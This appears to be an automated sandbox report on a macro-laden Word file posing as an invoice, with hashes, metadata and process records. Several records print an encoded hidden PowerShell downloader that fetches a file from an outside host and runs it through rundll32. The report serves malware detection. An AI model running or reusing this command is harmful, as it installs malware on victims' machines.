File name:

Фактура_28_04_2020.doc

Full analysis: https://app.any.run/tasks/65de39f7-efea-4f6d-9251-dd80cd852efa
Verdict: Malicious activity
Analysis date: April 28, 2020, 18:22:05
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Apr 27 13:51:00 2020, Last Saved Time/Date: Mon Apr 27 13:51:00 2020, Number of Pages: 1, Number of Words: 0, Number of Characters: 4, Security: 0
MD5:

65B1915A3ACB56FE3C519CA20BCC4142

SHA1:

7A62787C32CC9944F065E91986898E734D2C3591

SHA256:

3D6017419BB155CCF1A7AF49352D4942483D38DB5BE60040A85B72E97F41E176

SSDEEP:

1536:u45B060Bwq977diYcMWfu56MU7kQCJaxrg2oseKOdBxghCn/GvTGiyfPeGDbBezL:zJM0kQiaBeKPCn/mUPRZezj+D

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    No malicious indicators.

  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2792)
      • powershell.exe (PID: 3972)
      • powershell.exe (PID: 1252)
      • powershell.exe (PID: 3836)
      • powershell.exe (PID: 2444)
      • powershell.exe (PID: 3924)
      • powershell.exe (PID: 2932)

    • PowerShell script executed

      • powershell.exe (PID: 1252)
      • powershell.exe (PID: 2792)
      • powershell.exe (PID: 3972)
      • powershell.exe (PID: 3836)
      • powershell.exe (PID: 2444)
      • powershell.exe (PID: 3924)
      • powershell.exe (PID: 2932)
      • powershell.exe (PID: 2356)
      • powershell.exe (PID: 664)
      • powershell.exe (PID: 1156)
      • powershell.exe (PID: 480)
      • powershell.exe (PID: 2904)
      • powershell.exe (PID: 3240)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 4004)

    • Manual execution by user

      • powershell.exe (PID: 1252)
      • powershell.exe (PID: 3836)
      • powershell.exe (PID: 2792)
      • powershell.exe (PID: 3972)
      • powershell.exe (PID: 2444)
      • powershell.exe (PID: 3924)
      • powershell.exe (PID: 2932)
      • powershell.exe (PID: 2356)
      • powershell.exe (PID: 1156)
      • powershell.exe (PID: 664)
      • powershell.exe (PID: 480)
      • powershell.exe (PID: 2904)
      • powershell.exe (PID: 3240)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 4004)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: -
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2020:04:27 12:51:00
ModifyDate: 2020:04:27 12:51:00
Pages: 1
Words: -
Characters: 4
Security: None
CodePage: Windows Latin 1 (Western European)
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 4
AppVersion: 15
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
61
Monitored processes
14
Malicious processes
0
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
480"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -exec bypass -win hidden -noni -e IwAjACMAeABsAGUAdAB0AHIAbABwAHcAaQBiAHMACgAkAG0AZwB6AGkAZQB6AGQAcwBuAHMAagB6ACAAPQAgACIAcgB0AHMAdQB6AGwAbABmAGIAagBkAGoAbAAiADsACgAkAGkAbwBzAHQAYgBvAGgAegBsAHMAawA9ACIAeQBmAGEAZgBhACIAOwAKACQAZwBrAGkAYQB2AHAAdQBrAD0ANwA7AEYAbwByACAAKAAkAGoAYQBmAGsAYwBnAHoAZABhAGIAZgB5AGIAeQByAGgAbAB5AHoAbQByAD0AMAA7ACAAJABqAGEAZgBrAGMAZwB6AGQAYQBiAGYAeQBiAHkAcgBoAGwAeQB6AG0AcgAgAC0AbABlACAAMgAxADsAIAAkAGoAYQBmAGsAYwBnAHoAZABhAGIAZgB5AGIAeQByAGgAbAB5AHoAbQByACsAKwApACAAewAkAGcAawBpAGEAdgBwAHUAawA9ACAAKAA5ADIAIAAqACAAJABqAGEAZgBrAGMAZwB6AGQAYQBiAGYAeQBiAHkAcgBoAGwAeQB6AG0AcgApAH0ACgAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAIgBcACIAKwAkAG0AZwB6AGkAZQB6AGQAcwBuAHMAagB6ACsAIgAuAGIAaQBuACIAOwAKACQAYQBxAGYAdwB0AGkAcABmAGEAdQA9ACIAagBoAHUAeABtAHQAcQB0AGoAcABqAHIAZABiACIAOwAKACQAdQB1AG0AaAB1AGIAZABrAGoAPQAiAGgAdAB0AHAAOgAvAC8AdABvADQAawBhAHIAdQAuAHIAdQAvAGwAaQBlAHIAaABnAGkAbwBqAHMAZwBpAG8AdQB2AGIAagBuAGsAZgBlAGkAdQBiAGcALgBiAGkAbgAiADsACgAkAGkAbgBwAGsAZgBuAGgAbAB5AHQAdAA9ACIAbQB1AHkAdABpAGQAYwBnAGgAdgB5AGcAZwBiAHkAYgByACIAOwAKACQAcwBiAHgAaABxAGcAZgBqAGYAegBxAHkAbQB6ACAAPQAgACQAYwBrAGQAbgBqAHQAYwBuAG0AZgBwAGIAbgA7AAoAJAB6AHMAegBuAGcAaQBlAGsAeQBzAHkAYgA9ACIAegBtAHMAdQBtAGMAZABtAGIAegB6AHQAZwBxAHYAZgB1ACIAOwAKAGYAdQBuAGMAdABpAG8AbgAgAGcAbQBjAGgAawBrAGcAaQBuAHEAawBtAHoAcABvAHgAcQBvAHEAcQB7AAoAJABhAG4AZgByAGgAdwBoAD0AIgBzAHEAYgBmAHgAdQBsAHkAYgBoACIAOwAKACQAagBsAHoAeABiAHUAbAB5AGQAagBtAG8APQAiAGgAcwB1AHIAIgA7AAoAJABzAHYAagB6AHIAawB6AHQAPQAiAHYAYgBkAG0AegBxAGkAbQBwAHYAeQByAG4AegBxAHcAIgA7AAoAJABvAGUAaABkAHIAbwBrAHYAbABzAGkAdgA9ACIAbwBhAGoAcABzAHEAawAiADsACgAkAHEAbABtAGMAeAByAGMAegBvAHUAPQAiAHQAZgBhAHkAZQBoAHcAbAB5AHAAIgA7AAoAJAB6AGwAZgBuAHMAZQA9ACIAeABiAGoAegBlACIAOwAKAH0ACgBGAHUAbgBjAHQAaQBvAG4AIABkAHcAbgBsAGQAewAKACQAZQB0AHMAYgBzAGYAbAB4AG0APQAiAHYAdABjAHMAcwB6AHQAbQByAG8AbAB0AGIAIgA7AAoAVwBoAGkAbABlACAAKAAkAHMAYgB4AGgAcQBnAGYAagBmAHoAcQB5AG0AegAgAC0AZQBxACAAJABjAGsAZABuAGoAdABjAG4AbQBmAHAAYgBuACkAIAB7AAoAJAByAHgAbQBzAHoAawB6AG8AcQBrAHYAbwBuAGUAPQAiAGoAbQBqAGIAbABxACIAOwAKAHQAcgB5AHsACgAkAGMAcgB6AHQAagB4AGoAcQB2AGIAbwB5AGwAcAA9ACIAegBzAHgAagBkAGcAeABuAGwAZABnAGgAeQB5AGsAegAiADsACgAkAGQAaQBwAGQAaQB6AHMAbAB6AGMAPQAmACgAIgBuAGUAdwAtAG8AYgBqAGUAYwB0ACIAKQAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwAKACQAeABwAGYAegBjAHkAPQAiAHkAZABoAG0AbQBrAGkAZAB0AHAAYgB3AGoAYwBmAHkAeAAiADsACgAkAGQAaQBwAGQAaQB6AHMAbAB6AGMALgAiAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACIAKAAkAHUAdQBtAGgAdQBiAGQAawBqACwAIAAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoAKQA7AAoAJABlAHIAdABjAGgAYQA9ACIAaABlAGwAdwB4AHoAIgA7AAoASQBmACAAKAAoAC4AKAAiAEcAZQB0AC0ASQB0AGUAbQAiACkAIAAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoAKQAuACIAbABlAG4AZwB0AGgAIgAgAC0AZwBlACAAMQAwADIAMQAwADcAKQAgAHsACgAkAHYAaABtAGQAcABzAGgAcgBhAHEAYQB3AGMAbgA9ACIAaQBjAGQAagB4AGcAIgA7AAoAJABzAGIAeABoAHEAZwBmAGoAZgB6AHEAeQBtAHoAIAA9ACAAJABvAGgAegBkAHIAcgBvAHMAaQBsAGUAbgB4AGQAOwAKACQAZgBjAHcAbgBuAHAAcwA9ACIAYQBhAHIAZwBlAGwAcgBvAGMAYgBrAGEAdAB2AG8AIgA7AAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAIgByAHUAbgBkAGwAbAAzADIALgBlAHgAZQAiACAALQBBAHIAZwBzACAAIgAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoALAAgAEQAbABsAFIAZQBnAGkAcwB0AGUAcgBTAGUAcgB2AGUAcgAiADsACgAkAHEAawBnAHMAdQBqAHoAawBqAGkAPQAiAG0AegBjAGwAcwBrAG0AeABkAG4AdgBuAGEAcQB4AGsAIgA7AAoAZABlAGwAZgA7AAoAJAB5AGQAYgBoAGgAdwBrAGIAdAB4AGwAeABvAG8APQAiAHoAcQBlAGMAegBrAHQAIgA7AAoAZQB4AGkAdAA7AAoAJABlAGkAaQBlAHIAYwA9ACIAeQBvAGsAYwBnAHMAcABiAHEAbABiAGQAcABwAGEAZgAiADsACgB9AAoAJAByAG4AawBsAHIAaQBtAHYAZwBlAD0AIgByAHgAawB0AHMAZQBvAG4AdQB2ACIAOwAKAH0AYwBhAHQAYwBoAHsACgAkAGEAYgBuAGUAegByAG8AcQBrAGgAegB3AHQAdQA9ACIAagBzAGoAbgBpAHAAcgAiADsACgB9AAoAJAB5AHAAZgBtAGoAaABoAGEAaABoAD0AIgBjAHoAeQBmAHYAIgA7AAoAcwBsAGUAZQBwACAALQBzACAANQA7AAoAJABoAHgAbgBvAGIAPQAiAHcAZABoAGYAIgA7AAoAfQB9AGYAdQBuAGMAdABpAG8AbgAgAHQAdwBmAGoAYQB7AAoAJABwAHAAcQB4AGUAPQAiAGEAcAB3AGsAYQBoACIAOwAKACQAbgBoAGQAbgB6AHoAYwB5AGkAYgA9ACIAdABnAHcAZgBmACIAOwAKACQAdQB5AGUAdABjAGEAdABuAGUAagB1AG4APQAiAG4AcQBhAHMAZABjAHcAbgAiADsACgAkAGgAaAB1AGcAZwBuAHIAdwBqAGMAPQAiAHIAdQB6AHMAIgA7AAoAJABxAHcAeQB2AHYAdwBvAGoAPQAiAGQAZQBrAGkAIgA7AAoAJAB2AGwAcQBlAGEAPQAiAHkAcABiAGgAeQBmAHMAdwB3AHcAIgA7AAoAJAB5AGIAagB4AHoAdQBvAGkAeQB5AHEAagBmAHEAbAA9ACIAYgBuAGQAegBsAHIAYgB5AGIAZwB0AGgAYwBiACIAOwAKAH0ACgBGAHUAbgBjAHQAaQBvAG4AIABkAGUAbABmAHsACgAkAHkAdgBvAHcAaQB3AGEAPQAiAGIAZQB4AHoAIgA7AAoAdAByAHkAewAKACQAZABpAHoAcABtAGEAdQBwAG4AcgBpAG8AeQBnAHkAPQAiAHIAZABsAGwAbgBsAGwAcAB5AGMAaQBtAGgAYQB5AHMAbgAiADsACgBzAGwAZQBlAHAAIAAtAHMAIAAxADAAOwAKACQAdgB6AGIAaQBnAGgAbwBuAGUAegByAGgAZwBiAD0AIgB5AGoAdQBrAHYAeQB0AGoAYwB3AHMAaQBsAHYAbwBkAG0AawAiADsACgBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAdABvAHAAIAAtAFAAYQB0AGgAIAAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoAOwAKACQAbwBhAGoAdgBnAG4AdQBqAHYAZgBsAGQAPQAiAHEAdQBkAGQAdQBnAGgAcgAiADsACgB9AGMAYQB0AGMAaAB7AAoAJABwAHAAegBiAHYAcwBrAGIAbAA9ACIAZwB2AHYAaAAiADsACgBkAGUAbABmADsACgAkAHQAZwB1AGIAcQBwAG8AaQA9ACIAZQB5AGQAeABlAGEAcwB1AHYAegBnACIAOwAKAH0AfQBkAHcAbgBsAGQAOwAKACQAZABtAGUAawBnAG4APQAiAHIAdABuAGIAeQBnAGUAegBiAGwAYQBhAGYAYwBoAHoAZAAiADsACgA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
664"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -exec bypass -win hidden -noni -e IwAjACMAeABsAGUAdAB0AHIAbABwAHcAaQBiAHMACgAkAG0AZwB6AGkAZQB6AGQAcwBuAHMAagB6ACAAPQAgACIAcgB0AHMAdQB6AGwAbABmAGIAagBkAGoAbAAiADsACgAkAGkAbwBzAHQAYgBvAGgAegBsAHMAawA9ACIAeQBmAGEAZgBhACIAOwAKACQAZwBrAGkAYQB2AHAAdQBrAD0ANwA7AEYAbwByACAAKAAkAGoAYQBmAGsAYwBnAHoAZABhAGIAZgB5AGIAeQByAGgAbAB5AHoAbQByAD0AMAA7ACAAJABqAGEAZgBrAGMAZwB6AGQAYQBiAGYAeQBiAHkAcgBoAGwAeQB6AG0AcgAgAC0AbABlACAAMgAxADsAIAAkAGoAYQBmAGsAYwBnAHoAZABhAGIAZgB5AGIAeQByAGgAbAB5AHoAbQByACsAKwApACAAewAkAGcAawBpAGEAdgBwAHUAawA9ACAAKAA5ADIAIAAqACAAJABqAGEAZgBrAGMAZwB6AGQAYQBiAGYAeQBiAHkAcgBoAGwAeQB6AG0AcgApAH0ACgAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAIgBcACIAKwAkAG0AZwB6AGkAZQB6AGQAcwBuAHMAagB6ACsAIgAuAGIAaQBuACIAOwAKACQAYQBxAGYAdwB0AGkAcABmAGEAdQA9ACIAagBoAHUAeABtAHQAcQB0AGoAcABqAHIAZABiACIAOwAKACQAdQB1AG0AaAB1AGIAZABrAGoAPQAiAGgAdAB0AHAAOgAvAC8AdABvADQAawBhAHIAdQAuAHIAdQAvAGwAaQBlAHIAaABnAGkAbwBqAHMAZwBpAG8AdQB2AGIAagBuAGsAZgBlAGkAdQBiAGcALgBiAGkAbgAiADsACgAkAGkAbgBwAGsAZgBuAGgAbAB5AHQAdAA9ACIAbQB1AHkAdABpAGQAYwBnAGgAdgB5AGcAZwBiAHkAYgByACIAOwAKACQAcwBiAHgAaABxAGcAZgBqAGYAegBxAHkAbQB6ACAAPQAgACQAYwBrAGQAbgBqAHQAYwBuAG0AZgBwAGIAbgA7AAoAJAB6AHMAegBuAGcAaQBlAGsAeQBzAHkAYgA9ACIAegBtAHMAdQBtAGMAZABtAGIAegB6AHQAZwBxAHYAZgB1ACIAOwAKAGYAdQBuAGMAdABpAG8AbgAgAGcAbQBjAGgAawBrAGcAaQBuAHEAawBtAHoAcABvAHgAcQBvAHEAcQB7AAoAJABhAG4AZgByAGgAdwBoAD0AIgBzAHEAYgBmAHgAdQBsAHkAYgBoACIAOwAKACQAagBsAHoAeABiAHUAbAB5AGQAagBtAG8APQAiAGgAcwB1AHIAIgA7AAoAJABzAHYAagB6AHIAawB6AHQAPQAiAHYAYgBkAG0AegBxAGkAbQBwAHYAeQByAG4AegBxAHcAIgA7AAoAJABvAGUAaABkAHIAbwBrAHYAbABzAGkAdgA9ACIAbwBhAGoAcABzAHEAawAiADsACgAkAHEAbABtAGMAeAByAGMAegBvAHUAPQAiAHQAZgBhAHkAZQBoAHcAbAB5AHAAIgA7AAoAJAB6AGwAZgBuAHMAZQA9ACIAeABiAGoAegBlACIAOwAKAH0ACgBGAHUAbgBjAHQAaQBvAG4AIABkAHcAbgBsAGQAewAKACQAZQB0AHMAYgBzAGYAbAB4AG0APQAiAHYAdABjAHMAcwB6AHQAbQByAG8AbAB0AGIAIgA7AAoAVwBoAGkAbABlACAAKAAkAHMAYgB4AGgAcQBnAGYAagBmAHoAcQB5AG0AegAgAC0AZQBxACAAJABjAGsAZABuAGoAdABjAG4AbQBmAHAAYgBuACkAIAB7AAoAJAByAHgAbQBzAHoAawB6AG8AcQBrAHYAbwBuAGUAPQAiAGoAbQBqAGIAbABxACIAOwAKAHQAcgB5AHsACgAkAGMAcgB6AHQAagB4AGoAcQB2AGIAbwB5AGwAcAA9ACIAegBzAHgAagBkAGcAeABuAGwAZABnAGgAeQB5AGsAegAiADsACgAkAGQAaQBwAGQAaQB6AHMAbAB6AGMAPQAmACgAIgBuAGUAdwAtAG8AYgBqAGUAYwB0ACIAKQAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwAKACQAeABwAGYAegBjAHkAPQAiAHkAZABoAG0AbQBrAGkAZAB0AHAAYgB3AGoAYwBmAHkAeAAiADsACgAkAGQAaQBwAGQAaQB6AHMAbAB6AGMALgAiAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACIAKAAkAHUAdQBtAGgAdQBiAGQAawBqACwAIAAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoAKQA7AAoAJABlAHIAdABjAGgAYQA9ACIAaABlAGwAdwB4AHoAIgA7AAoASQBmACAAKAAoAC4AKAAiAEcAZQB0AC0ASQB0AGUAbQAiACkAIAAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoAKQAuACIAbABlAG4AZwB0AGgAIgAgAC0AZwBlACAAMQAwADIAMQAwADcAKQAgAHsACgAkAHYAaABtAGQAcABzAGgAcgBhAHEAYQB3AGMAbgA9ACIAaQBjAGQAagB4AGcAIgA7AAoAJABzAGIAeABoAHEAZwBmAGoAZgB6AHEAeQBtAHoAIAA9ACAAJABvAGgAegBkAHIAcgBvAHMAaQBsAGUAbgB4AGQAOwAKACQAZgBjAHcAbgBuAHAAcwA9ACIAYQBhAHIAZwBlAGwAcgBvAGMAYgBrAGEAdAB2AG8AIgA7AAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAIgByAHUAbgBkAGwAbAAzADIALgBlAHgAZQAiACAALQBBAHIAZwBzACAAIgAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoALAAgAEQAbABsAFIAZQBnAGkAcwB0AGUAcgBTAGUAcgB2AGUAcgAiADsACgAkAHEAawBnAHMAdQBqAHoAawBqAGkAPQAiAG0AegBjAGwAcwBrAG0AeABkAG4AdgBuAGEAcQB4AGsAIgA7AAoAZABlAGwAZgA7AAoAJAB5AGQAYgBoAGgAdwBrAGIAdAB4AGwAeABvAG8APQAiAHoAcQBlAGMAegBrAHQAIgA7AAoAZQB4AGkAdAA7AAoAJABlAGkAaQBlAHIAYwA9ACIAeQBvAGsAYwBnAHMAcABiAHEAbABiAGQAcABwAGEAZgAiADsACgB9AAoAJAByAG4AawBsAHIAaQBtAHYAZwBlAD0AIgByAHgAawB0AHMAZQBvAG4AdQB2ACIAOwAKAH0AYwBhAHQAYwBoAHsACgAkAGEAYgBuAGUAegByAG8AcQBrAGgAegB3AHQAdQA9ACIAagBzAGoAbgBpAHAAcgAiADsACgB9AAoAJAB5AHAAZgBtAGoAaABoAGEAaABoAD0AIgBjAHoAeQBmAHYAIgA7AAoAcwBsAGUAZQBwACAALQBzACAANQA7AAoAJABoAHgAbgBvAGIAPQAiAHcAZABoAGYAIgA7AAoAfQB9AGYAdQBuAGMAdABpAG8AbgAgAHQAdwBmAGoAYQB7AAoAJABwAHAAcQB4AGUAPQAiAGEAcAB3AGsAYQBoACIAOwAKACQAbgBoAGQAbgB6AHoAYwB5AGkAYgA9ACIAdABnAHcAZgBmACIAOwAKACQAdQB5AGUAdABjAGEAdABuAGUAagB1AG4APQAiAG4AcQBhAHMAZABjAHcAbgAiADsACgAkAGgAaAB1AGcAZwBuAHIAdwBqAGMAPQAiAHIAdQB6AHMAIgA7AAoAJABxAHcAeQB2AHYAdwBvAGoAPQAiAGQAZQBrAGkAIgA7AAoAJAB2AGwAcQBlAGEAPQAiAHkAcABiAGgAeQBmAHMAdwB3AHcAIgA7AAoAJAB5AGIAagB4AHoAdQBvAGkAeQB5AHEAagBmAHEAbAA9ACIAYgBuAGQAegBsAHIAYgB5AGIAZwB0AGgAYwBiACIAOwAKAH0ACgBGAHUAbgBjAHQAaQBvAG4AIABkAGUAbABmAHsACgAkAHkAdgBvAHcAaQB3AGEAPQAiAGIAZQB4AHoAIgA7AAoAdAByAHkAewAKACQAZABpAHoAcABtAGEAdQBwAG4AcgBpAG8AeQBnAHkAPQAiAHIAZABsAGwAbgBsAGwAcAB5AGMAaQBtAGgAYQB5AHMAbgAiADsACgBzAGwAZQBlAHAAIAAtAHMAIAAxADAAOwAKACQAdgB6AGIAaQBnAGgAbwBuAGUAegByAGgAZwBiAD0AIgB5AGoAdQBrAHYAeQB0AGoAYwB3AHMAaQBsAHYAbwBkAG0AawAiADsACgBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAdABvAHAAIAAtAFAAYQB0AGgAIAAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoAOwAKACQAbwBhAGoAdgBnAG4AdQBqAHYAZgBsAGQAPQAiAHEAdQBkAGQAdQBnAGgAcgAiADsACgB9AGMAYQB0AGMAaAB7AAoAJABwAHAAegBiAHYAcwBrAGIAbAA9ACIAZwB2AHYAaAAiADsACgBkAGUAbABmADsACgAkAHQAZwB1AGIAcQBwAG8AaQA9ACIAZQB5AGQAeABlAGEAcwB1AHYAegBnACIAOwAKAH0AfQBkAHcAbgBsAGQAOwAKACQAZABtAGUAawBnAG4APQAiAHIAdABuAGIAeQBnAGUAegBiAGwAYQBhAGYAYwBoAHoAZAAiADsACgA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
1156"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -exec bypass -win hidden -noni -e IwAjACMAeABsAGUAdAB0AHIAbABwAHcAaQBiAHMACgAkAG0AZwB6AGkAZQB6AGQAcwBuAHMAagB6ACAAPQAgACIAcgB0AHMAdQB6AGwAbABmAGIAagBkAGoAbAAiADsACgAkAGkAbwBzAHQAYgBvAGgAegBsAHMAawA9ACIAeQBmAGEAZgBhACIAOwAKACQAZwBrAGkAYQB2AHAAdQBrAD0ANwA7AEYAbwByACAAKAAkAGoAYQBmAGsAYwBnAHoAZABhAGIAZgB5AGIAeQByAGgAbAB5AHoAbQByAD0AMAA7ACAAJABqAGEAZgBrAGMAZwB6AGQAYQBiAGYAeQBiAHkAcgBoAGwAeQB6AG0AcgAgAC0AbABlACAAMgAxADsAIAAkAGoAYQBmAGsAYwBnAHoAZABhAGIAZgB5AGIAeQByAGgAbAB5AHoAbQByACsAKwApACAAewAkAGcAawBpAGEAdgBwAHUAawA9ACAAKAA5ADIAIAAqACAAJABqAGEAZgBrAGMAZwB6AGQAYQBiAGYAeQBiAHkAcgBoAGwAeQB6AG0AcgApAH0ACgAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAIgBcACIAKwAkAG0AZwB6AGkAZQB6AGQAcwBuAHMAagB6ACsAIgAuAGIAaQBuACIAOwAKACQAYQBxAGYAdwB0AGkAcABmAGEAdQA9ACIAagBoAHUAeABtAHQAcQB0AGoAcABqAHIAZABiACIAOwAKACQAdQB1AG0AaAB1AGIAZABrAGoAPQAiAGgAdAB0AHAAOgAvAC8AdABvADQAawBhAHIAdQAuAHIAdQAvAGwAaQBlAHIAaABnAGkAbwBqAHMAZwBpAG8AdQB2AGIAagBuAGsAZgBlAGkAdQBiAGcALgBiAGkAbgAiADsACgAkAGkAbgBwAGsAZgBuAGgAbAB5AHQAdAA9ACIAbQB1AHkAdABpAGQAYwBnAGgAdgB5AGcAZwBiAHkAYgByACIAOwAKACQAcwBiAHgAaABxAGcAZgBqAGYAegBxAHkAbQB6ACAAPQAgACQAYwBrAGQAbgBqAHQAYwBuAG0AZgBwAGIAbgA7AAoAJAB6AHMAegBuAGcAaQBlAGsAeQBzAHkAYgA9ACIAegBtAHMAdQBtAGMAZABtAGIAegB6AHQAZwBxAHYAZgB1ACIAOwAKAGYAdQBuAGMAdABpAG8AbgAgAGcAbQBjAGgAawBrAGcAaQBuAHEAawBtAHoAcABvAHgAcQBvAHEAcQB7AAoAJABhAG4AZgByAGgAdwBoAD0AIgBzAHEAYgBmAHgAdQBsAHkAYgBoACIAOwAKACQAagBsAHoAeABiAHUAbAB5AGQAagBtAG8APQAiAGgAcwB1AHIAIgA7AAoAJABzAHYAagB6AHIAawB6AHQAPQAiAHYAYgBkAG0AegBxAGkAbQBwAHYAeQByAG4AegBxAHcAIgA7AAoAJABvAGUAaABkAHIAbwBrAHYAbABzAGkAdgA9ACIAbwBhAGoAcABzAHEAawAiADsACgAkAHEAbABtAGMAeAByAGMAegBvAHUAPQAiAHQAZgBhAHkAZQBoAHcAbAB5AHAAIgA7AAoAJAB6AGwAZgBuAHMAZQA9ACIAeABiAGoAegBlACIAOwAKAH0ACgBGAHUAbgBjAHQAaQBvAG4AIABkAHcAbgBsAGQAewAKACQAZQB0AHMAYgBzAGYAbAB4AG0APQAiAHYAdABjAHMAcwB6AHQAbQByAG8AbAB0AGIAIgA7AAoAVwBoAGkAbABlACAAKAAkAHMAYgB4AGgAcQBnAGYAagBmAHoAcQB5AG0AegAgAC0AZQBxACAAJABjAGsAZABuAGoAdABjAG4AbQBmAHAAYgBuACkAIAB7AAoAJAByAHgAbQBzAHoAawB6AG8AcQBrAHYAbwBuAGUAPQAiAGoAbQBqAGIAbABxACIAOwAKAHQAcgB5AHsACgAkAGMAcgB6AHQAagB4AGoAcQB2AGIAbwB5AGwAcAA9ACIAegBzAHgAagBkAGcAeABuAGwAZABnAGgAeQB5AGsAegAiADsACgAkAGQAaQBwAGQAaQB6AHMAbAB6AGMAPQAmACgAIgBuAGUAdwAtAG8AYgBqAGUAYwB0ACIAKQAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwAKACQAeABwAGYAegBjAHkAPQAiAHkAZABoAG0AbQBrAGkAZAB0AHAAYgB3AGoAYwBmAHkAeAAiADsACgAkAGQAaQBwAGQAaQB6AHMAbAB6AGMALgAiAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACIAKAAkAHUAdQBtAGgAdQBiAGQAawBqACwAIAAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoAKQA7AAoAJABlAHIAdABjAGgAYQA9ACIAaABlAGwAdwB4AHoAIgA7AAoASQBmACAAKAAoAC4AKAAiAEcAZQB0AC0ASQB0AGUAbQAiACkAIAAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoAKQAuACIAbABlAG4AZwB0AGgAIgAgAC0AZwBlACAAMQAwADIAMQAwADcAKQAgAHsACgAkAHYAaABtAGQAcABzAGgAcgBhAHEAYQB3AGMAbgA9ACIAaQBjAGQAagB4AGcAIgA7AAoAJABzAGIAeABoAHEAZwBmAGoAZgB6AHEAeQBtAHoAIAA9ACAAJABvAGgAegBkAHIAcgBvAHMAaQBsAGUAbgB4AGQAOwAKACQAZgBjAHcAbgBuAHAAcwA9ACIAYQBhAHIAZwBlAGwAcgBvAGMAYgBrAGEAdAB2AG8AIgA7AAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAIgByAHUAbgBkAGwAbAAzADIALgBlAHgAZQAi